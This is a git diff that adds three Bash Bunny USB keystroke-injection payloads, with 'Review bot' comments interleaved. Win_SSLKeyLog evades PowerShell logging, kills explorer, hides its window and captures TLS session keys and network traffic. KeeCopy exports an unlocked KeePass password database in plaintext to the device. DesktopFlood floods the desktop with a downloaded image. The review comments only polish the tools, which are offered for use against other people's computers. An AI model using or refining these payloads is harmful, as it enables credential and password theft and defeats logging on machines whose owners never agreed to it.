diff --git a/payloads/library/credentials/win_sslkeylog/README.md b/payloads/library/credentials/win_sslkeylog/README.md
new file mode 100644
index 00000000..26f5e470
--- /dev/null
+++ b/payloads/library/credentials/win_sslkeylog/README.md
@@ -0,0 +1,63 @@
+# "Microsoft Windows" SSLKEYLOG
+
+- Title: Win_SSLKeyLog
+- Author: TW-D
+- Version: 1.0
+- Target: Microsoft Windows
+- Category: Credentials
+
+## Description
+
+>
+> Captures the client network session.
+>
+> Captures the client side session keys.
+>
+
+1) Partially avoids "PowerShell Script Block Logging".
+2) Closing of all windows.
+3) Hide "PowerShell" window.
+4) Check if current process have "Administrator" privilege.
+5) Sets the "SSLKEYLOGFILE" environment variable to store SSL session key information.
+6) Starts a "Network Tracing Session" with "ETW (Event Tracing for Windows)".
+7) Writes the file system cache to disk.
+8) Safely eject.
+
+## Configuration
+
+From "payload.txt" change the values of the following constants :
+```bash
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+readonly SNIFFING_TIME=300
+
+
+```
+
+## Required
+
+Utility that converts an .etl file containing a Windows network packet capture into .pcapng format.
+[ETL2PCAPNG](https://github.com/microsoft/etl2pcapng)
+
+Wireshark network protocol analyzer.
+[WIRESHARK](https://www.wireshark.org/)
+
+## Steps
+
+Convert "capture.etl" file into "capture.pcapng" with "etl2pcapng".
+```
+.\etl2pcapng.exe .\capture.etl .\capture.pcapng
+```
+
+Open your "capture.pcapng" with "Wireshark".
+
+Configure "Wireshark" for HTTPS decryption.
+```
+Edit - Preferences
+Protocols - (SSL and/or TLS)
+(Pre)-Master-Secret log filename -> Browse -> SSLKEYLOGFILE.txt
+```
+
+Happy hunting.
diff --git a/payloads/library/credentials/win_sslkeylog/payload.ps1 b/payloads/library/credentials/win_sslkeylog/payload.ps1
new file mode 100644
index 00000000..b0df0e4b
--- /dev/null
+++ b/payloads/library/credentials/win_sslkeylog/payload.ps1 
@@ -0,0 +1,58 @@
+#
+# Author: TW-D
+# Version: 1.0
+#
+
+Param (
+ [String] $BB_VOLUME,
+ [Int] $SNIFFING_TIME
+)
+
+# Partially avoids "PowerShell Script Block Logging".
+#
+$etw_provider = [Ref].Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider").GetField("etwProvider", "NonPublic,Static")
+$event_provider = New-Object System.Diagnostics.Eventing.EventProvider -ArgumentList @([Guid]::NewGuid())
+$etw_provider.SetValue($null, $event_provider)
+
+# Closing of all windows.
+#
+Get-Process -Name "explorer" | Stop-Process
+
+# Hide "PowerShell" window.
+#
+$Script:showWindowAsync = Add-Type -MemberDefinition @"
+[DllImport("user32.dll")]
+public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);
+"@ -Name "Win32ShowWindowAsync" -Namespace Win32Functions -PassThru
+$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0) | Out-Null
+
+# Check if current process have "Administrator" privilege.
+#
+If ( ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator") ) {
+
+ $bb_loot = "${BB_VOLUME}loot\"
+
+ # Sets the "SSLKEYLOGFILE" environment variable to store SSL session key information.
+ #
+ [Environment]::SetEnvironmentVariable("SSLKEYLOGFILE", $null, "User")
+ [Environment]::SetEnvironmentVariable("SSLKEYLOGFILE", "${bb_loot}SSLKEYLOGFILE.txt", "User")
+
+ # Starts a "Network Tracing Session" with "ETW (Event Tracing for Windows)".
+ #
+ (NETSH trace start capture=yes report=no persistent=yes traceFile="${bb_loot}capture.etl" maxSize=0 fileMode=append) | Out-Null
+ Start-Sleep -Seconds $SNIFFING_TIME
+ (NETSH trace stop) | Out-Null
+
+ [Environment]::SetEnvironmentVariable("SSLKEYLOGFILE", $null, "User")
+
+}
+
+"Win_SSLKeyLog terminated." | Out-File -FilePath .\..\..\loot\done.txt -Force
+
+# Writes the file system cache to disk (thanks to @dark_pyrro).
+#
+Write-VolumeCache -DriveLetter ("${BB_VOLUME}".Substring(0,1))
+
+# Safely eject (thanks to @Night (9o3)).
+#
+(New-Object -ComObject Shell.Application).Namespace(17).ParseName("${BB_VOLUME}").InvokeVerb("Eject")
\ No newline at end of file
diff --git a/payloads/library/credentials/win_sslkeylog/payload.txt b/payloads/library/credentials/win_sslkeylog/payload.txt
new file mode 100644
index 00000000..1dbcb386
--- /dev/null
+++ b/payloads/library/credentials/win_sslkeylog/payload.txt
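Review bot: `$bb_loot` is assigned only inside the Administrator `If` block, while the `done.txt` marker near the end is written to a relative path (`.\..\..\loot\done.txt`) that resolves only because payload.txt has `CD`'d into the switch directory first; the two loot paths should agree. Moving `$bb_loot = "${BB_VOLUME}loot\"` above the `If` and writing `"Win_SSLKeyLog terminated." | Out-File -FilePath "${bb_loot}done.txt" -Force` makes the marker independent of the working directory. The `Param` block also leaves the contract undocumented: `$BB_VOLUME` is concatenated with no separator, so it must end in a backslash, and `$SNIFFING_TIME` is seconds because it feeds `Start-Sleep -Seconds`; a header comment such as `# BB_VOLUME: drive root including the trailing backslash; SNIFFING_TIME: capture duration in seconds` would state that. When the caller is not an Administrator the script silently skips the whole capture block yet still writes done.txt and ejects, which the same comment should mention so an empty loot folder is not mistaken for a capture failure.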
@@ -0,0 +1,108 @@
+#!/bin/bash
+#
+# Title: Win_SSLKeyLog
+#
+# Description:
+# Captures the client network session.
+# Captures the client side session keys.
+#
+# 1) Partially avoids "PowerShell Script Block Logging".
+# 2) Closing of all windows.
+# 3) Hide "PowerShell" window.
+# 4) Check if current process have "Administrator" privilege.
+# 5) Sets the "SSLKEYLOGFILE" environment variable to store SSL session key information.
+# 6) Starts a "Network Tracing Session" with "ETW (Event Tracing for Windows)".
+# 7) Writes the file system cache to disk (thanks to @dark_pyrro).
+# 8) Safely eject (thanks to @Night (9o3)).
+#
+# Author: TW-D
+# Version: 1.0
+# Category: Credentials
+# Target: Microsoft Windows 10
+# Attackmodes: HID and STORAGE
+#
+# TESTED ON
+# ===============
+# Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1)
+# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
+#
+# REQUIREMENTS
+# ===============
+# The target user must belong to the 'Administrator' group.
+#
+# STATUS
+# ===============
+# Magenta solid ................................... SETUP
+# Yellow single blink ............................. ATTACK
+# Yellow double blink ............................. STAGE2
+# Yellow triple blink ............................. STAGE3
+# Cyan inverted single blink ...................... SPECIAL
+# White fast blink ................................ CLEANUP
+# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+readonly SNIFFING_TIME=300
+
+######## SETUP ########
+
+LED SETUP
+
+ATTACKMODE HID STORAGE
+GET SWITCH_POSITION
+udisk mount
+
+######## ATTACK ########
+
+LED ATTACK
+
+Q DELAY 5000
+Q GUI r
+Q DELAY 5000
+Q STRING "powershell -NoLogo -NoProfile -ExecutionPolicy Bypass"
+Q DELAY 1500
+Q CTRL-SHIFT ENTER
+Q DELAY 5000
+Q LEFTARROW
+Q DELAY 3000
+Q ENTER
+Q DELAY 7000
+
+LED STAGE2
+
+Q STRING "\$BB_VOLUME = \"\$((Get-WmiObject -Class Win32_Volume -Filter \"Label LIKE '${BB_LABEL}'\").Name)\""
+Q ENTER
+Q DELAY 3500
+
+Q STRING "\$BB_SWITCH = \"\${BB_VOLUME}payloads\\${SWITCH_POSITION}\\\""
+Q ENTER
+Q DELAY 1500
+
+Q STRING "CD \"\${BB_SWITCH}\""
+Q ENTER
+Q DELAY 1500
+
+LED STAGE3
+
+Q STRING ".\payload.ps1 -BB_VOLUME \"\${BB_VOLUME}\" -SNIFFING_TIME ${SNIFFING_TIME}"
+Q ENTER
+Q DELAY 1500
+
+LED SPECIAL
+
+until [ -f /root/udisk/loot/done.txt ]; do sleep 10; sync; done
+
+######## CLEANUP ########
+
+LED CLEANUP
+
+rm /root/udisk/loot/done.txt
+sync
+udisk unmount
+
+######## FINISH ########
+
+LED FINISH
+
+shutdown -h 0
\ No newline at end of file
diff --git a/payloads/library/exfiltration/keecopy/README.md b/payloads/library/exfiltration/keecopy/README.md
new file mode 100644
index 00000000..4166cf2a
--- /dev/null
+++ b/payloads/library/exfiltration/keecopy/README.md
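Review bot: `readonly SNIFFING_TIME=300` carries no unit, and the value only acquires one when it is handed to payload.ps1's `Start-Sleep -Seconds` far down the file; a comment on the constant, `# Capture duration in seconds (passed through to payload.ps1 -SNIFFING_TIME)`, keeps this file and the README's Configuration block in step. The `until [ -f /root/udisk/loot/done.txt ]; do sleep 10; sync; done` loop is the only thing gating CLEANUP and has no upper bound, so if STAGE2 or STAGE3 does not complete (wrong volume label, elevation prompt not confirmed) the device stays in SPECIAL indefinitely; that should at least be stated in the STATUS comment block so the LED is read correctly. The header's `Target: Microsoft Windows 10` also disagrees with the README's `Target: Microsoft Windows`; pick one and use it in both.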
@@ -0,0 +1,33 @@
+# KeePass Automated Exporter
+
+- Title: KeeCopy
+- Author: jrwimmer
+- Version: 1.0
+- Target: Windows Vista+
+- Category: Exfiltration
+
+## Description
+
+Performs keystroke automation to export an unencrypted copy of an unlocked KeePass database
+The copy is saved to the loot folder on the Bash Bunny USB Mass Storage partition
+
+Important Considerations:
+
+This script makes the following assumptions.
+- The target computer is unlocked
+- The target computer has KeePass 2.x installed and running with an unlocked database
+- KeePass only has one database open, or the desired database was the last one in focus
+- KeePass is using the default "Show KeePass window" hot key of: `Ctrl + Alt + K`
+
+## Configuration
+
+Hot key settings and/or script tweaks may be necessary depending on the target system.
+
+## STATUS
+
+| LED | Status |
+| -------- | ------------------------- |
+| STAGE1 | Determine output location |
+| STAGE2 | Export database |
+| FINISH | Payload complete |
+
diff --git a/payloads/library/exfiltration/keecopy/payload.txt b/payloads/library/exfiltration/keecopy/payload.txt
new file mode 100644
index 00000000..2d3bafb1
--- /dev/null
+++ b/payloads/library/exfiltration/keecopy/payload.txt
@@ -0,0 +1,102 @@
+#!/bin/bash
+#
+# Title: KeeCopy
+# Description: All-in-one script using keystroke automation to export an unencrypted copy of an unlocked KeePass database.
+# The database copy is saved to the loot folder on the Bash Bunny USB Mass Storage partition
+# Author: jrwimmer
+# Version: 1.0
+# Category: Exfiltration
+# Target: Windows Vista+ (PowerShell, clip.exe)
+# Attackmodes: HID, Storage
+#
+#
+
+##################################
+# Options #
+##################################
+
+# KEEPASS_SHOW (DUCKY KEY COMBO) - Specify the hot key combination anticipated to show the KeePass window
+KEEPASS_SHOW="CTRL-ALT k"
+
+# KEEPASS_WAITSAVE (MILLISECONDS) - How long to wait for KeePass to complete the export
+KEEPASS_WAITSAVE=5000
+
+# POWEROFF_AFTER (Y/N) - Power down the BashBunny upon completion
+POWEROFF_AFTER="Y"
+
+
+##################################
+# Stage 1: Determine destination #
+##################################
+LED STAGE1
+
+# Activate HID and STORAGE capabilities
+ATTACKMODE HID STORAGE
+
+# Open PowerShell
+RUN WIN powershell.exe
+QUACK DELAY 2000
+
+# Locate the BashBunny volume and store it on the clipboard
+QUACK STRING "powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -Command \"(gwmi win32_volume -Filter {label='BashBunny'}).Name\" | clip;exit"
+QUACK ENTER
+
+##################################
+# Stage 2: Export database #
+##################################
+LED STAGE2
+
+# Open KeePass
+QUACK $KEEPASS_SHOW
+QUACK DELAY 500
+
+# Open the File menu
+QUACK ALT f
+QUACK DELAY 100
+
+# Select "Export"
+QUACK e
+QUACK DELAY 100
+
+# Move focus into the format selector
+QUACK TAB
+QUACK TAB
+
+# Skip down to "Customizable HTML File"
+QUACK c
+
+# Move up to "KeePass XML (2.x)"
+QUACK UP
+
+# Move focus to the Destination File field
+QUACK TAB
+
+# Paste the path copied in STAGE1
+QUACK CTRL v
+
+# Append the rest of the destination path
+QUACK STRING "loot\KPDB-$(date +%Y%m%d-%k%M%S).xml"
+
+# ...and export!
+QUACK ENTER
+
+# Wait for KeePass to complete the export
+QUACK DELAY $KEEPASS_WAITSAVE
+
+##################################
+# Cleanup #
+##################################
+LED CLEANUP
+
+# Synchronize disks
+SYNC
+
+##################################
+# Finish #
+##################################
+LED FINISH
+
+# Power off
+if [ $POWEROFF_AFTER == "Y" ]; then
+ halt --poweroff
+fi
\ No newline at end of file
diff --git a/payloads/library/prank/DesktopFlood/README.md b/payloads/library/prank/DesktopFlood/README.md
new file mode 100644
index 00000000..9602cb8c
--- /dev/null
+++ b/payloads/library/prank/DesktopFlood/README.md
@@ -0,0 +1,13 @@
+# DesktopFlood
+Floods the desktop with a image of your choice
+
+## Configuration
+Image Link, Image Name, Amount of Images. Bluetooth if you want, in Setup
+
+## LED
+
+| COLOR | DESCRIPTION |
+|---------|-------------|
+| White | Setup/Wait |
+| Yellow | Attacking |
+| Green | Finished |
diff --git a/payloads/library/prank/DesktopFlood/payload.txt b/payloads/library/prank/DesktopFlood/payload.txt
new file mode 100644
index 00000000..bc13e6be
--- /dev/null
+++ b/payloads/library/prank/DesktopFlood/payload.txt
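Review bot: `if [ $POWEROFF_AFTER == "Y" ]; then` word-splits an unquoted variable inside single-bracket `[`, where `==` is itself a bashism; since the file is `#!/bin/bash`, write `if [[ "$POWEROFF_AFTER" == "Y" ]]; then` (ShellCheck SC2086). `QUACK $KEEPASS_SHOW` by contrast depends on word-splitting so that `CTRL-ALT k` reaches QUACK as two arguments, which deserves a comment such as `# intentionally unquoted: the combo is passed as two words`. In the export filename `date +%k` pads a single-digit hour with a space rather than a zero (`%H` is the zero-padded form), so before 10:00 the name contains an embedded space. `LED CLEANUP` is reached but the README's STATUS table lists only STAGE1, STAGE2 and FINISH, and the upper-case `SYNC` under "Synchronize disks" should be checked against the Bash Bunny command set, since the Linux utility is `sync` and the sibling win_sslkeylog payload uses the lower-case form.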
@@ -0,0 +1,46 @@
+#!/bin/bash
+#
+# Title: Desktop Flood
+# Description: Floods desktop with image it downloads from link
+# Author: JustaProgrammer9
+# Category: Prank
+# Target: Windows
+# Attackmodes: HID
+#
+
+#--// CONFIG \\--#
+
+#removing [ https:// ] can help keep command below runbox character limit
+
+ImageLink='i.ytimg.com/vi/7yN0g2QIJSU/maxresdefault.jpg'
+
+ImageName="Gift"
+
+Amount=50
+
+
+####--// SETUP \\--####
+
+LED W
+
+ATTACKMODE HID
+
+#--> FOR BLUETOOTH <--#
+
+#WAIT_FOR_PRESENT YourDevice
+#WAIT_FOR_NOT_PRESENT YourDevice
+
+
+#--// ATTACK \\--#
+
+LED Y
+
+RUN WIN "cmd /c powershell \"curl $ImageLink -O C:\Users\%USERNAME%\Desktop\\$ImageName.jpg;sleep 1;1..$Amount | % { copy-Item \"C:\Users\%USERNAME%\desktop\\$ImageName.jpg\" \"C:\Users\%USERNAME%\desktop\\$ImageName\$_.jpg\"}\""
+
+Q ENTER
+
+
+####--// DONE \\--####
+
+LED G
+
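Review bot: `$ImageName` and `$Amount` are spliced unescaped into the quoted PowerShell command in the `RUN WIN` line, so a name containing a quote, `$`, `;` or a space breaks the command, and nothing in the CONFIG comments says so; add `# ImageName must be a plain alphanumeric name: it is inserted unescaped into the command below` next to `ImageName="Gift"`, and a similar note that `Amount` must be an integer. The payload also fetches `$ImageLink` from a third-party host at run time, so its outcome depends on that host still serving the file; worth stating on the `ImageLink=` line. The comment `#removing [ https:// ] can help keep command below runbox character limit` should say what dropping the scheme does to the download: `curl` here is PowerShell's alias for `Invoke-WebRequest`, and whether it accepts a scheme-less URL depends on the PowerShell version, which I cannot confirm from this file. Finally, `ImageLink`/`ImageName`/`Amount` mix CamelCase into a bash script whose sibling payloads in this commit (`BB_LABEL`, `KEEPASS_SHOW`) use `UPPER_SNAKE_CASE` for configurable constants; matching them would make the library consistent.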